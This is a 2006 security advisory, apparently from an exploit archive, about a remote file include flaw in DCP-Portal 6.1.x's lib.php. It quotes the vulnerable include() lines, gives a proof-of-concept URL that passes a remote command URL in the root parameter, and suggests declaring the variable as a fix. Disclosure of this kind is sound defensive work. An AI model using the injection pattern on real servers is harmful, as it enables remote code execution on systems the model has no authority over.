[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : DCP-Portal 6.1.x (root) Remote File Include Vulnerability
# Published : 2006-06-12
# Author : Federico Fazzi
# Previous Title : blur6ex <= 0.3.462 (ID) Admin Disclosure / Blind SQL Injection Exploit
# Next Title : WebprojectDB <= 0.1.3 (INCDIR) Remote File Include Vulnerability
-----------------------------------------------------
Advisory id: FSA:013
Author: Federico Fazzi
Date: 12/06/2006, 9:31
Sinthesis: DCP-Portal 6.1.x, Remote command execution
Type: high
Product: http://www.dcp-portal.org/
Patch: unavailable
-----------------------------------------------------
1) Description:
Error occured in lib.php, line 4/7:
include ("$root/library/lib_nav.php");
include ("$root/library/lib_mods.php");
include ("$root/library/lib_admin.php");
include ("$root/library/lib_3rd.php");
variable $root not sanitized (declare).
2) Proof of concept:
http://example/[dp_path]/library/lib.php?root=[cmd_url]
3) Solution:
declare $root variable on this file.
# www.Syue.com [2006-06-12]